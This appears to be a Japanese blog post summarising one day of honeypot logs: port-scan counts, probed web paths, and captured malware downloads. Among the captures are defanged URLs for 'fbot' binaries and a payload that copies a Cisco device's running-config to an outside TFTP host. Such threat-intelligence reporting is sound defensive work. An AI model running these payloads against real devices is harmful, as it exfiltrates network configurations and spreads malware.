【ハニーポット簡易分析】Honeypot簡易分析(322日目:7/5)

Honeypot簡易分析(322日目:7/5)となります。

■Honeytrap
※80ポートは除く

＜ポート検知数（30日平均比）＞

ポート番号	サービス	件数	件数差(30日平均)
445	smb	4289	838
5038	Unknown	2092	2080
23	telnet	1466	-18
5900	vnc	529	-3473
3306	mysql	329	159
139	netbios-ssn	284	261
3389	rdp	132	-102
81	hosts2-ns	85	56
3307	opsession-prxy	80	38
2323	telnet	77	-10

＜新規マルウェアダウンロード＞

malware	payload
134.209.230[.]124	POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
hxxp://5.206.227[.]65/codingdrunk/fbot.x86	CNXN…
ftp://103.26.100[.]154/160.16.145.183[.]conf	G7.`......copy system:running-config flash:/config.text.... ....copy flash:/config.text tftp://103[.]26[.]100[.]154/160[.]16[.]145[.]183[.]conf..
hxxp://5.206.227[.]65/codingdrunk/fbot.arm7	CNXN…

Cisco OSへの攻撃を狙ったと思われる通信を検知していました。マルウェアの種類までは特定できませんでした。

■WoWHoneeypot
＜検知パス一覧＞

path	target	CVE	reference
/	-	-	-
/admin/assets/js/views/login.js	FreePBX	-	https://git.freepbx.org/projects/FREEPBX/repos/framework/browse/amp_conf/htdocs/admin/assets/js/views/login.js?at=bfb36fa7ac70c2e642257dbcd99a1799e19ea743
/favicon.ico	-	-	-
/robots.txt	-	-	-
hxxp://110.249.212[.]46/testget	Unauthorized Relay	-	-
/.well-known/security.txt	SSL certificate	-	https://qiita.com/comefigo/items/e9b1bce93c1b615e5934
/sitemap.xml	xml sitemap	-	-
/user/login.html	Unknown	-	-
/.git/config	git	-	-
/\cgi-bin/get_status.cgi	/\cgi-bin/get_status.cgi	-	-
/\cgi-bin/login.cgi	CGI	-	-
/web/cgi-bin/hi3510/param.cgi	Zivif Web	CVE-2017-17106	https://sec-owl.hatenablog.com/entry/2018/09/24/011848
cn.bing.com:443	Unauthorized Relay	-	-
hxxp://123.125.114[.]144/	Unauthorized Relay	-	-
hxxp://5.188.210[.]101/echo.php	Unauthorized Relay	-	-
hxxp://www.123cha[.]com/	Unauthorized Relay	-	-
hxxp://www.ip[.]cn/	Unauthorized Relay	-	-
www[.]baidu[.]com:443	Unauthorized Relay	-	-
xui.ptlogin2[.]qq[.]com:443	Unauthorized Relay	-	-

＜新規検知パス一覧＞
なし

＜マルウェアダウンロード＞
なし

以上となります。

sec-chick Blog